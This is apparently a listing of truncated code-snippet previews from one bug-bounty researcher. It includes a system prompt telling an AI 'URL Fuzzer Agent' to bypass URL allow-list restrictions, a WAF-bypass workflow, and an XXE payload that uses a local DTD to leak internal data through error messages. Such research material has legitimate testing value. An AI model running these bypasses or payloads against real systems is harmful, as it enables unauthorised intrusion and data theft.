Rhynorater

URL Fuzzer Agent

You are the master of all URL formats. You wrote all the RFCs and have them all memorized word for word. You're focused and adderalled up and ready to try to bypass URL restrictions.

The user has provided your with a URL that needs to be bypassed. Here is how to go about it:

1. Try different protocols than the one present. Try at minimum, http, https, javascript (if that makes sense), ftp, custom.
2. Try only protocol:data like http:site.com. Also try with one slash http:/site.com and mix in uses of \ where interesting
3. Also, if applicable to the situation, try the // trick to get a path that looks relative be absolute. Use \ here as well.
4. Fuzz the domain portion. Figure out if subdomains of the site are permitted. Check if you can include trailing dots.
5. Check for dot-based regex misconfigurations

Rhynorater

{
  "description": "",
  "edition": 2,
  "graph": {
    "edges": [
      {
        "source": {
          "exec_alias": "exec",
          "node_id": 0
        },

Rhynorater

{
  "description": "Bypass WAFs with 8KB Padding.",
  "edition": 2,
  "graph": {
    "edges": [
      {
        "source": {
          "exec_alias": "exec",
          "node_id": 2
        },

Rhynorater

version: "3.8"
# NOTE! This docker container has hard-coded values for passwords - this is intentional as this is testing machine. DO NOT EXPOSE TO THE INTERNET.
services:
  database:
    image: mariadb:10.6.4-focal
    restart: unless-stopped
    ports:
      - 3306:3306
    environment:
      MYSQL_ROOT_PASSWORD: 'CTBB_ROOT_PASSWD'

Rhynorater

<!DOCTYPE doc [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
    <!ENTITY % SuperClass '>
        <!ENTITY &#x25; file SYSTEM "http://example.com:9200/_cat/indices">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
      <!ENTITY test "test"'
    >
    %local_dtd;

Rhynorater

Quick little solution to add port forwarding to WSL on windows

addPortForward.ps1

$port = $args[0]
netsh interface portproxy add v4tov4 listenport=$port listenaddress=0.0.0.0 connectport=$port connectaddress=(wsl bash ~/.getIP.sh)

=============

Rhynorater

!(function (I, e) {
  if ("object" == typeof exports && "object" == typeof module)
    module.exports = e();
  else if ("function" == typeof define && define.amd) define([], e);
  else {
    var o = e();
    for (var t in o) ("object" == typeof exports ? exports : I)[t] = o[t];
  }
})(self, function () {

Rhynorater

{
  "site": {
    "externalURL": "http://NOPE.com/",
    "auth.providers": [
      {
        "type": "builtin"
      }
    ],
    "search.largeFiles": [
      "*.js"

Rhynorater

pragma solidity ^0.8.0;

contract Demo{
    event log(string data);
    string public d= "This is a variable";
    string public mv = "changed";
    string public mv2 = "changed2";
    constructor () {
        string storage x = d;
        string storage y = x; // Change this to: string memory y = x;

Rhynorater

var Web3 = require('web3');
const fs = require('fs')
const inquirer = require('inquirer')
var questions = [
    {
      type: 'input',
      name: 'privateKey',
      message: "What is your privateKey?"
    },
    {